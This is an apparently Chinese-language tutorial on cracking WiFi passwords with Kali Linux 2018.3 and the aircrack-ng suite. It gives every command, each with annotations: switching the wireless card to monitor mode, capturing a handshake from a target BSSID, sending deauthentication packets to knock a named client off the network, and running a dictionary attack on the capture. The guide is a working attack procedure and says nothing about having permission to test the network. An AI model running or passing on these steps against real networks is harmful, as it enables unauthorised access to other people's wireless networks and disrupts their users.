镜像下载:http://old.kali.org/
某大佬推荐使用2018.3版
http://old.kali.org/kali-images/kali-2018.3/
安装fruitywifi
apt-get install fruitywifi -y
通过IP:8000可访问web管理面板。
- ifconfig
- iwconfig
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- iwconfig
- airmon-ng start wlan0
- airodump-ng mon0
- airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
- aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
- aircrack-ng -w /root/Desktop/zidian.txt test-01.cap
ifconfig
2:查看网卡工作模式
iwconfig
3:关闭网卡
示例命令:
ifconfig wlan0 down
命令部分注释如下:
ifconfig wlan0(选择网卡) down
4:更改网卡模式为monitor模式
示例命令:
iwconfig wlan0 mode monitor
命令部分注释如下:
iwconfig wlan0(选择网卡) mode monitor
5:启动网卡
示例命令:
ifconfig wlan0 up
命令部分注释如下:
ifconfig wlan0(选择网卡) up
6:查看网卡工作模式
iwconfig
7:启动airmon-ng开启网卡监听模式
示例命令:
airmon-ng start wlan0
命令部分注释如下:
airmon-ng start wlan0(选择网卡)
8:扫描无线网络
airodump-ng mon0
9:开始抓包
示例命令:
airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
命令部分注释如下:
airodump-ng -c 11(选择信道) -w test(自己定义的网络抓包的名字) --bssid EC:26:CA:10:58:62(无线网络MAC地址) mon0
10:发送流量攻击包
aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
命令部分注释如下:
aireplay-ng -0 10 -a EC:26:CA:10:58:62(无线网络MAC地址) -c A4:DB:30:A4:CF:F5(用户MAC地址) mon0
11:若抓包失败,则运行该条命令,从8~10步开始执行(此步骤可不执行)
rm -r test-01.*
命令部分注释如下:
rm -r test(自己定义的网络抓包的名字)-0(为1—9的数字,例如:01、02、03等,自己定义的网络抓包的名字+0.cap 即为握手包名).
12:开始破解WIFI密码
aircrack-ng -w /root/Desktop/zidian.txt test-01.cap
命令部分注释如下:
aircrack-ng -w /root/Desktop/zidian.txt(字典存放的完整路径) test(自己定义的网络抓包的名字)-0(为1—9的数字,按tab键会显示出来,若不出来,则用ls查看已抓到的握手包是哪个).cap(自己定义的网络抓包的名字+0*.cap)